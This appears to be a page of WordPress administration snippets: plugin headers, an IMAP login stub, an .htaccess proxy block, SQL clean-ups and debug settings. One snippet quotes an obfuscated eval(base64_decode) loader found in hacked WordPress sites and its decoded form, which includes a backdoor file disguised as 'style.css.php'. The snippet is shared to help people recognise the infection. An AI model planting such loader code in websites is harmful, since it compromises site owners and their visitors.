boogah

<?php
/*
Plugin Name: Index.php fix
Plugin URI: http://ilikewordpress.com/loading-wordpress-from-index-php
Description: This plugin allows a blog installed at root to be addressed by /index.php. Remedies stripping of filename by includes/canonical.php
Author: Steve Johnson
Version: 1.0
Author URI: http://ilikewordpress.com/
*/

boogah

#!/usr/bin/ruby
require 'net/imap'

server = 'imap.mail.com'
username = 'YOUR USERNAME'
password = 'YOUR PASSWORD'
folder = 'INBOX'

imap = Net::IMAP.new(server, 993, true)
imap.login(user, password)

boogah

RewriteEngine on
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule ^(.*)$ - [F]

boogah

WP Bag of Tricks

1. Helpful Scripts/Plugins:

Hacks:

	http://wordpress.org/extend/plugins/tac/
	http://wordpress.org/extend/plugins/exploit-scanner/ (Can be extremely resource intensive.)
	http://wordpress.org/extend/plugins/wp-malwatch/

boogah

DELETE FROM  'wp_options' WHERE 'option_name' LIKE CONVERT( _utf8 '_transient_feed%' USING latin1 ) COLLATE latin1_swedish_ci;

boogah

<?php
/*
Plugin Name: Gravatar Hovercards
Plugin URI: http://ottopress.com/2010/gravatar-hovercards/
Description: Hover over a Gravatar to get more info. Neat-o!
Version: 0.1
Author: Otto
*/

function gravatar_hovercards_jquery() {

boogah

I've been seeing this code crop up a lot in recent WordPress hacks:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

The issue normally involves "wp-login.php" returning a blank page for users trying to get into "wp-admin".

Running that bit of nastiness thru a base64 decoder gets us this:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

boogah

Clean debugging:

// Add this to wp-config.php to cleanly debug a site.
// Just make sure to turn it off when you're done!
define('WP_DEBUG',         true);  // Turn debugging ON
define('WP_DEBUG_DISPLAY', false); // Turn forced display OFF
define('WP_DEBUG_LOG',     true);  // Turn logging to wp-content/debug.log ON

# Drop this in a .htaccess file in wp-content to keep the log safe.
<files debug.log>

boogah

update wp_posts set post_content = replace(post_content,'’','\'');
update wp_posts set post_title = replace(post_title,'’','\'');
update wp_comments set comment_content = replace(comment_content,'’','\'');
update wp_postmeta set meta_value = replace(meta_value,'’','\'');
update wp_posts set post_excerpt = replace(post_excerpt,'’','\'');

update wp_posts set post_content = replace(post_content,'…','...');
update wp_posts set post_title = replace(post_title,'…','...');
update wp_comments set comment_content = replace(comment_content,'…','...');
update wp_postmeta set meta_value = replace(meta_value,'…','...');

boogah

<form method="get" action="http://duckduckgo.com/"
onsubmit="document.getElementById('ddgsearchinput').value+=' site:example.com'">
<input type="search" id="ddgsearchinput" name="q" size="24"/>
</form>